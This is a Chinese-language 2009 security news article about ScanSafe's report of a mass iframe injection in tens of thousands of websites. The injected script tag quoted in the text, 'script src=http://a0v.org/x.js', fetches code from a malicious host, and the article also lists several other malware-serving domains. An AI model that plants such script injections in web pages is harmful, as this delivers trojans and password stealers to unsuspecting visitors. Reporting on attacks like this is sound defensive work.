ScanSafe:上万网页存在恶意代码(图)

来源:岁月联盟 编辑:zhuzhu 时间:2009-12-04
ScanSafe:上万网页存在恶意代码(图)

ScanSafe 是一家著名的软件即服务(SaaS)模式的 Web安全产品厂商。在它们的STAT Blog中经常有一些非常有价值的信息。在近日的博客文章中,该公司表示,有超过5.5万网站感染有 Potent Backdoor/Data Theft Cocktail恶意代码。  

臭名昭著的iFrame

ScanSafe的 Mary Landesman是这篇惊人博客的作者,他发现一个含有恶意代码的iFrame被嵌入到了超过5.5万个网站的网页代码中。直到我研究了这段iFrame代码,我才意识到这个问题有多么严重。根据Web Design Group的解释,一个iFrame 包括:

“IFRAME 元素定义了一个嵌入式框架,用于包含外部对象,包括其他HTML文档。 IFRAME 提供与OBJECT类似的功能。IFRAME的一个优点是它可以充当其它链接的目标。”

最后一句是我们需要特别注意的。在上文提到的例子中, iFrame 包含了以下一小段看似无害的代码:

“script src=http://a0v.org/x.js”

如果笔者的理解没错的话,这个iFrame将把浏览器重定向到http://a0v.org/a.js(请勿尝试访问)而不被用户发觉。

接下来会发生什么

毫无疑问,域名为a0v.org的网站页面上包含了强大的恶意代码。Landesman解释说,一旦浏览器访问a0v.org,就会有一系列的恶意代码,比如木马,后门,密码记录器甚至后台下载程序都会试图自动安装到你的系统里。如果恰好你所使用的是Windows系统,并且漏洞还没有打补丁,那么大部分恶意软件都会顺利安全你的系统。

没错,这是一个只针对Windows系统的问题。所幸的是,我们的系统都具备自动更新功能,并且都已经安装了最新的补丁程序,对吧?

试试看

笔者最感兴趣的事,是我们可以自己重复Landesman的实验,简单的发现到底有多少网页带有这种恶意的iFrame。实验方法很简单,只需要在我们常用的搜索引擎中输入 “script src=http://a0v.org/x.js”并检查返回了多少结果就可以了。

当Landesman刚发表这篇博客的时候,他从Google中搜索到了54,900个结果,而接下来的一天,我在Google中搜索到了97,200 个结果。其中包含feedzilla.com, latindiscover.com, 以及 foodsresourcebank.org等主流网站。也许是人为的结果,但是没有人告诉我为什么仅隔了一天,就会多出那么多带有恶意代码的网站。

A0v.org 并不是唯一一个带有恶意程序的网站,其它类似的网站域名还包括:ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info。 Landesman 表示 ahthja.info 是这些域名中影响最大的一个。下面是 WHOIS对ahthja.info的记录:

ScanSafe:上万网页存在恶意代码

请注意其中不同寻常的注册信息和街道信息。可以想到这种信息基本上是无法被追查到的。

其它对策

我并不是一个网页开发人员,但是好像如果我们不学习一些这方面的知识,就很难解决网络安全问题,除非所有的客户端脚本都是安全的。当然,禁用Javascript或者使用类似NoScript 的软件也可以解决类似问题。只不过这样会让我们今后所浏览的网页看上去有些不正常。

总 结

我能够理解为什么世界上有那么多个人电脑被病毒或其它恶意程序感染。但是我不明白为什么会有那么多网络服务器也如此不堪一击。难道是这些服务的漏洞太新了,只有那些制造恶意代码的人才知道并利用了这些漏洞?看起来好像是这样吧。